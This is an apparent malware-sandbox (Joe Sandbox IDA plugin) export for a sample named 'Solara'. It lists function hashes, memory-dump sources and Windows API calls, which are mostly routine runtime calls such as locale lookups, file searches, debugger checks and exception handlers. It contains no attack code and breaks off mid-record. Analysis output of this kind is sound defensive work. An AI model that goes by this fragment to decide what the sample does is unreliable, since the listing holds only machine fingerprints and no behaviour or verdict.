                                                                                                                                      • Instruction ID: c7cec249ae6ad7e6a2d3a557c8e00f1617d83168ccf281d5728ee3c35070f39d
                                                                                                                                      • Opcode Fuzzy Hash: fba8c70cef620072eb110d6d1ef962cc36d3fd7aaefe734522d41c0e985cfc83
                                                                                                                                      • Instruction Fuzzy Hash: 59516071A20226BBDB20EFE5EC45EBE77B9AF25700F144465F905E7190E7709A70CB60
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __floor_pentium4
                                                                                                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                      • API String ID: 4168288129-2761157908
                                                                                                                                      • Opcode ID: 83f5e8c17ad2f4f4f96d2754c67e55604c03dd2ac0d1b8b624c6ed2dcc5e53c4
                                                                                                                                      • Instruction ID: e689771d90c4a61bfb1acd02fe12a552973db6e8d360650a93a9a6166e3f15d8
                                                                                                                                      • Opcode Fuzzy Hash: 83f5e8c17ad2f4f4f96d2754c67e55604c03dd2ac0d1b8b624c6ed2dcc5e53c4
                                                                                                                                      • Instruction Fuzzy Hash: 6AD26B71E292299FDB64CE68EC407EAB7B5FB54304F1401EAD40DE7240EB78AE958F41
                                                                                                                                      APIs
                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,2000000B,002213BD,00000002,00000000,?,?,?,002213BD,?,00000000), ref: 00221AA0
                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,20001004,002213BD,00000002,00000000,?,?,?,002213BD,?,00000000), ref: 00221AC9
                                                                                                                                      • GetACP.KERNEL32(?,?,002213BD,?,00000000), ref: 00221ADE
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InfoLocale
                                                                                                                                      • String ID: ACP$OCP
                                                                                                                                      • API String ID: 2299586839-711371036
                                                                                                                                      • Opcode ID: 083d4a6b937a61f0097e7b146c2b83335e517912b1b1d0dc8692f519b0bec96c
                                                                                                                                      • Instruction ID: d907c4121d0182726d67f44ab989919fb8dcc51ed2078e6b879c80264922aa0b
                                                                                                                                      • Opcode Fuzzy Hash: 083d4a6b937a61f0097e7b146c2b83335e517912b1b1d0dc8692f519b0bec96c
                                                                                                                                      • Instruction Fuzzy Hash: B021B822B22122B6D7348FD4E904E9772AAEB74B54B968435E909D7100E731DE70C390
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 3bc9877c2baeb9d2eefe3dc346bd414728ba2a6b644d6a7f2363c8b83004931b
                                                                                                                                      • Instruction ID: 1b63e56013f978c6a94efebc621a8bcb3b6580830d976a0283ebb2b4bcd391c5
                                                                                                                                      • Opcode Fuzzy Hash: 3bc9877c2baeb9d2eefe3dc346bd414728ba2a6b644d6a7f2363c8b83004931b
                                                                                                                                      • Instruction Fuzzy Hash: 33024C71E1121A9BDF14CFA8C8807EEB7F5FF58314F24826AE519E7341D731AA918B90
                                                                                                                                      APIs
                                                                                                                                      • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 002220D9
                                                                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 002221CD
                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0022220C
                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0022223F
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Find$CloseFile$FirstNext
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1164774033-0
                                                                                                                                      • Opcode ID: 06a0b4f75e8eaa7e9a1061e171066d36176c5cccfcb29597bb64c84a9717886f
                                                                                                                                      • Instruction ID: e5380fdc65a8b4cc880fa3306d68c8a2843f45549fd32df6a8a01f77413e00d5
                                                                                                                                      • Opcode Fuzzy Hash: 06a0b4f75e8eaa7e9a1061e171066d36176c5cccfcb29597bb64c84a9717886f
                                                                                                                                      • Instruction Fuzzy Hash: 3A71E571915179FEDF219FA4EC8DAFAB7B9AB15300F1442D9E448A7211DB324EE88F10
                                                                                                                                      APIs
                                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 0020F8F5
                                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 0020F9C1
                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0020F9DA
                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 0020F9E4
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 254469556-0
                                                                                                                                      • Opcode ID: 7f4505ebfe792d6aa26ce1fce54198a4018c5bdf88f4610706efc795769c4e34
                                                                                                                                      • Instruction ID: e4db289d4a63e3b8690f5d7d23655091c1fc56526890f9e3de52ae14f5145c67
                                                                                                                                      • Opcode Fuzzy Hash: 7f4505ebfe792d6aa26ce1fce54198a4018c5bdf88f4610706efc795769c4e34
                                                                                                                                      • Instruction Fuzzy Hash: A131F675D1131DABDB61DFA4D9497CDBBB8AF08300F1081AAE40CAB290EB719A95CF45
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 0021C16A: GetLastError.KERNEL32(?,?,00215495,00238E38,0000000C), ref: 0021C16E
                                                                                                                                        • Part of subcall function 0021C16A: SetLastError.KERNEL32(00000000), ref: 0021C210
                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 002215D4
                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0022161E
                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 002216E4
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InfoLocale$ErrorLast
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 661929714-0
                                                                                                                                      • Opcode ID: cd09b5c9389501e81359430977de918df65e5b2cb995d5a1ffd2a9f9f5b5b367
                                                                                                                                      • Instruction ID: e10b341b416977a0c8da2d8017936cd3f0cded105d797ada30a58e2cd3564086
                                                                                                                                      • Opcode Fuzzy Hash: cd09b5c9389501e81359430977de918df65e5b2cb995d5a1ffd2a9f9f5b5b367
                                                                                                                                      • Instruction Fuzzy Hash: 3461A471560127AFDB289F64EC82FBAB3A8EF64700F144175E905C6185E775DAB0CF50
                                                                                                                                      APIs
                                                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00217F28
                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00217F32
                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 00217F3F
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3906539128-0
                                                                                                                                      • Opcode ID: daf9d2027e7fe35fa549b7e53716502d88ec69259554326843280abf2d79ac0e
                                                                                                                                      • Instruction ID: 0fc39ec6858b392d68b90bfc00507056c747820d421522d5b45ff9151cbb133b
                                                                                                                                      • Opcode Fuzzy Hash: daf9d2027e7fe35fa549b7e53716502d88ec69259554326843280abf2d79ac0e
                                                                                                                                      • Instruction Fuzzy Hash: F731C17491122DABCB21DF64D9897CDBBF8AF18310F5042EAE40CA7291E7309F958F45
                                                                                                                                      APIs
                                                                                                                                      • GetSystemTimePreciseAsFileTime.KERNEL32 ref: 002100EC
                                                                                                                                      • GetSystemTimeAsFileTime.KERNEL32(?,75E5C5C8,00208E30,?,0022BE77,000000FF,?,0020FDB4,?,00000000,00000000,?,0020FDD8,?,00208E30,?), ref: 002100F0
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Time$FileSystem$Precise
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 743729956-0
                                                                                                                                      • Opcode ID: 13e1fc9903e23891663d2dbaeca5c4dcd9227bdb6ff886249722e30d730e2893
                                                                                                                                      • Instruction ID: 304c5c132aed05ed37469365c90a70f27b7584773b509cdb72fabe95bf8b15f1
                                                                                                                                      • Opcode Fuzzy Hash: 13e1fc9903e23891663d2dbaeca5c4dcd9227bdb6ff886249722e30d730e2893
                                                                                                                                      • Instruction Fuzzy Hash: 0FF06532A54668FFCB028F54EC49B9EB7ACF708B10F01416AE91293790DB756940DB80
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: (=!$0
                                                                                                                                      • API String ID: 0-3681308281
                                                                                                                                      • Opcode ID: 24bd89f8c8ea662106cc7fe569ce5f8a49eed9acd14ada291b0f32fa3b8c6008
                                                                                                                                      • Instruction ID: b2fff840eb26abd7fce91cba86ca0eb03c235dd036ab4bc2821818bb888af279
                                                                                                                                      • Opcode Fuzzy Hash: 24bd89f8c8ea662106cc7fe569ce5f8a49eed9acd14ada291b0f32fa3b8c6008
                                                                                                                                      • Instruction Fuzzy Hash: 48B1E4309206079BCB28EF69C5556FE7BF1AF34300F24461EEA5E97681C73199E1CB41
                                                                                                                                      APIs
                                                                                                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00225BB9,?,?,00000008,?,?,0022BCAB,00000000), ref: 00225E8B
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExceptionRaise
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3997070919-0
                                                                                                                                      • Opcode ID: e878b8adb4f22fb6c4d54c5157ccc5b6d06a3dd70d8414df35c6ffda86903f24
                                                                                                                                      • Instruction ID: 5027bc75e9265e4110fdec8e54bebb92f9dcb9137ed76e8b3bbc13016913ed6e
                                                                                                                                      • Opcode Fuzzy Hash: e878b8adb4f22fb6c4d54c5157ccc5b6d06a3dd70d8414df35c6ffda86903f24
                                                                                                                                      • Instruction Fuzzy Hash: 04B18131120A29EFD715CF68D48AB657BE0FF05364F29C658E899CF2A1C735D9A1CB40
                                                                                                                                      APIs
                                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0020F56B
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FeaturePresentProcessor
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2325560087-0
                                                                                                                                      • Opcode ID: 3fa635452ff05a1aad1cc8767a04e9e0e32bdeeee9fe79e0b324cab3bd30642c
                                                                                                                                      • Instruction ID: 7f0e340aadbf91a977cf933130988b87777db8cc964e1fa97abd871ebaab5e3b
                                                                                                                                      • Opcode Fuzzy Hash: 3fa635452ff05a1aad1cc8767a04e9e0e32bdeeee9fe79e0b324cab3bd30642c
                                                                                                                                      • Instruction Fuzzy Hash: 09A1ADB2D203059BDB29CF54E989699BBF9FB48320F28C62AD511E73A5D3749980CF50
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 0021C16A: GetLastError.KERNEL32(?,?,00215495,00238E38,0000000C), ref: 0021C16E
                                                                                                                                        • Part of subcall function 0021C16A: SetLastError.KERNEL32(00000000), ref: 0021C210
                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00221894
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorLast$InfoLocale
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3736152602-0
                                                                                                                                      • Opcode ID: 1d6e51d280c110422d0da44c9eaba3b0633650e7abf3b1a3bf9671bd0fbe55fe
                                                                                                                                      • Instruction ID: 54f692fc73730dfbe7d6705355e6e5b7e358e525ab97dd1978a0a18f70cc372f
                                                                                                                                      • Opcode Fuzzy Hash: 1d6e51d280c110422d0da44c9eaba3b0633650e7abf3b1a3bf9671bd0fbe55fe
                                                                                                                                      • Instruction Fuzzy Hash: FC21D8326202277BEB189E65EC81EBA33ACEF24710B10407AFD02C6141EB74DD70CB51
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 0021C16A: GetLastError.KERNEL32(?,?,00215495,00238E38,0000000C), ref: 0021C16E
                                                                                                                                        • Part of subcall function 0021C16A: SetLastError.KERNEL32(00000000), ref: 0021C210
                                                                                                                                      • EnumSystemLocalesW.KERNEL32(00221580,00000001,00000000,?,-00000050,?,00221363,00000000,-00000002,00000000,?,00000055,?), ref: 0022154A
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2417226690-0
                                                                                                                                      • Opcode ID: 83f6f905f05eeb679597ccf57901a7100dc4c02cbc3474d851e1ddecb8080a38
                                                                                                                                      • Instruction ID: aec07648d9260463202b940cb3ce9521fd98fa4f3074e374642abfea58b03ccf
                                                                                                                                      • Opcode Fuzzy Hash: 83f6f905f05eeb679597ccf57901a7100dc4c02cbc3474d851e1ddecb8080a38
                                                                                                                                      • Instruction Fuzzy Hash: 81114C372103116FDB189F79D8919BAB791FF90758B54442CE94747B40E771B972CB80
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 0021C16A: GetLastError.KERNEL32(?,?,00215495,00238E38,0000000C), ref: 0021C16E
                                                                                                                                        • Part of subcall function 0021C16A: SetLastError.KERNEL32(00000000), ref: 0021C210
                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 002219B4
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorLast$InfoLocale
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3736152602-0
                                                                                                                                      • Opcode ID: 1e446af08252e2cc73060f762780cea73a4b15c8a96955414b9836aaead7ee24
                                                                                                                                      • Instruction ID: cf60f4d7af5c7951d57eb57e8ff43eec71eccd3ec728020c45fa3911c00966c8
                                                                                                                                      • Opcode Fuzzy Hash: 1e446af08252e2cc73060f762780cea73a4b15c8a96955414b9836aaead7ee24
